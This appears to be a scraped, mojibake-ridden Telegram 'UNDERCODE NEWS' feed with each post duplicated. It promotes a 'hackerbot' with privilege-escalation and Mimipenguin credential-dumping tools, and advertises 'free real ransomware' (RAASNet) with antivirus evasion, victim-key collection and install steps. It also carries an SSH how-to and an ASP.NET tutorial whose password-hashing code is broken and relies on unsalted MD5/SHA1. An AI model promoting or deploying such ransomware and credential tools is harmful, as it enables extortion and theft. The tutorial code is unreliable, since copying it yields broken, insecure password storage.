Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This bot is a combination of chatbot and hacking tools
Chatting
Twitter account analysis
Url scan
File scan
Ip scan
Linux enumeration
Linux priv escalation checker
Shellshock
Mimipenguin
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/omergunal/hackerbot
2) cd hackerbot
3) chmod +x install.sh
4) ./install.sh
5) python hackerbot.py
arguments in chat:
!help show what you can do
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This bot is a combination of chatbot and hacking tools
Chatting
Twitter account analysis
Url scan
File scan
Ip scan
Linux enumeration
Linux priv escalation checker
Shellshock
Mimipenguin
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/omergunal/hackerbot
2) cd hackerbot
3) chmod +x install.sh
4) ./install.sh
5) python hackerbot.py
arguments in chat:
!help show what you can do
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - omergunal/hackerbot: Chat with hacker assistant
Chat with hacker assistant. Contribute to omergunal/hackerbot development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED ANOTHER FREE REAL RANSOMWARE:
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
Testing connection with remote server:
5) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED ANOTHER FREE REAL RANSOMWARE:
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
Testing connection with remote server:
5) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Built-in SSH client in Windows 10:
1) The Microsoft PowerShell development team decided to migrate OpenSSH (both client and server) to Windows in 2015.
Finally, it appeared in the Windows 10 Fall Creator Update in 2017 and is enabled by default in the April 2018 update.
2) To use the OpenSSH client on Windows 10, simply open a PowerShell window or Command Prompt window and run ssh.
For example, if I want to connect to my Ubuntu desktop on my local network, I would run.
ssh cryptoparty@192.168.0.101
cryptoparty is the username on my Ubuntu desktop and 192.168.0.101 is the private IP address of my Ubuntu desktop.
3) The first time you connect to a Linux computer, you will be prompted to accept the host key.
4) Then enter your password to login .
Once logged in, you can run Linux commands to perform administrative tasks.
5) To exit the Linux window, run the exit command or press Ctrl + D.
To exit the Linux window, run the exit command or press Ctrl + D.
NOW CONNECTED!
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Built-in SSH client in Windows 10:
1) The Microsoft PowerShell development team decided to migrate OpenSSH (both client and server) to Windows in 2015.
Finally, it appeared in the Windows 10 Fall Creator Update in 2017 and is enabled by default in the April 2018 update.
2) To use the OpenSSH client on Windows 10, simply open a PowerShell window or Command Prompt window and run ssh.
For example, if I want to connect to my Ubuntu desktop on my local network, I would run.
ssh cryptoparty@192.168.0.101
cryptoparty is the username on my Ubuntu desktop and 192.168.0.101 is the private IP address of my Ubuntu desktop.
3) The first time you connect to a Linux computer, you will be prompted to accept the host key.
4) Then enter your password to login .
Once logged in, you can run Linux commands to perform administrative tasks.
5) To exit the Linux window, run the exit command or press Ctrl + D.
To exit the Linux window, run the exit command or press Ctrl + D.
NOW CONNECTED!
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use ASP.NET to encrypt password ?
In ASP, encrypted objects are not provided, we can only use external objects to encrypt. Well now, the encryption solution is provided in ASP.NET. In the namespace System.Web.Security contains the class FormsAuthentication, which has a method HashPasswordForStoringInConfigFile. This method can turn the characters provided by the user into garbled codes, and then store them, or even store them in cookies.
The HashPasswordForStoringInConfigFile method is very simple to use, it supports "SHA1" and "MD5" encryption algorithms.
The following code simply demonstrates its usage:
<%@ Page language="c#" %>
<%@ Import Namespace="System.Web.Security" %>
<html>
<head>
<script language="C#" runat="server">
public void encryptString(Object sender, EventArgs e)
{
SHA1.Text = FormsAuthentication.
MD5.Text =FormsAuthentication.HashPasswordForStoringInConfigFile(txtPassword.Text, "MD5");
}
</script>
</head>
<body>
<form runat="server" ID="Form1">
<p>
<b>Original Clear Text Password: </b>
<br>
<asp:Textbox id="txtPassword" runat="server" />
<asp:Button runat="server" text="Encrypt String" onClick="encryptString" ID="Button1 "/>
</p>
<p>
<b>Encrypted Password In SHA1: </b>
<asp:label id="SHA1" runat="server" />
</p>
<p>
<b>Encrypted Password In MD5: </b>
<asp:label id="MD5" runat="server" />
</p>
</form>
</body>
</html>
As you can see, it is so easy to use. We can encapsulate this encryption program in a function for repeated use. The code is as follows:
public string EncryptPassword(string PasswordString,string PasswordFormat)
{
if (PasswordFormat="SHA1"){
EncryptPassword=FormsAuthortication.HashPasswordForStoringInConfigFile(PasswordString ,"SHA1");
}
elseif (PasswordFormat="MD5")
{EncryptPassword=FormsAuthortication. HashPasswordForStoringInConfigFile(PasswordString ,"MD5");
}
else
{
EncryptPassword="";
}
We can add a field to the database and use insert to store the encrypted password as a string in the database. When the user logs in, the encrypted result of the password entered by the user can be compared with the correct result in the database, and the correctness of the password can be verified by this method
@uNDERCODETesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to use ASP.NET to encrypt password ?
In ASP, encrypted objects are not provided, we can only use external objects to encrypt. Well now, the encryption solution is provided in ASP.NET. In the namespace System.Web.Security contains the class FormsAuthentication, which has a method HashPasswordForStoringInConfigFile. This method can turn the characters provided by the user into garbled codes, and then store them, or even store them in cookies.
The HashPasswordForStoringInConfigFile method is very simple to use, it supports "SHA1" and "MD5" encryption algorithms.
The following code simply demonstrates its usage:
<%@ Page language="c#" %>
<%@ Import Namespace="System.Web.Security" %>
<html>
<head>
<script language="C#" runat="server">
public void encryptString(Object sender, EventArgs e)
{
SHA1.Text = FormsAuthentication.
MD5.Text =FormsAuthentication.HashPasswordForStoringInConfigFile(txtPassword.Text, "MD5");
}
</script>
</head>
<body>
<form runat="server" ID="Form1">
<p>
<b>Original Clear Text Password: </b>
<br>
<asp:Textbox id="txtPassword" runat="server" />
<asp:Button runat="server" text="Encrypt String" onClick="encryptString" ID="Button1 "/>
</p>
<p>
<b>Encrypted Password In SHA1: </b>
<asp:label id="SHA1" runat="server" />
</p>
<p>
<b>Encrypted Password In MD5: </b>
<asp:label id="MD5" runat="server" />
</p>
</form>
</body>
</html>
As you can see, it is so easy to use. We can encapsulate this encryption program in a function for repeated use. The code is as follows:
public string EncryptPassword(string PasswordString,string PasswordFormat)
{
if (PasswordFormat="SHA1"){
EncryptPassword=FormsAuthortication.HashPasswordForStoringInConfigFile(PasswordString ,"SHA1");
}
elseif (PasswordFormat="MD5")
{EncryptPassword=FormsAuthortication. HashPasswordForStoringInConfigFile(PasswordString ,"MD5");
}
else
{
EncryptPassword="";
}
We can add a field to the database and use insert to store the encrypted password as a string in the database. When the user logs in, the encrypted result of the password entered by the user can be compared with the correct result in the database, and the correctness of the password can be verified by this method
@uNDERCODETesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
PS5 is crispy by adopting explosive SSD, initially opposed to adopting "liquid metal"
#Technologies
#Technologies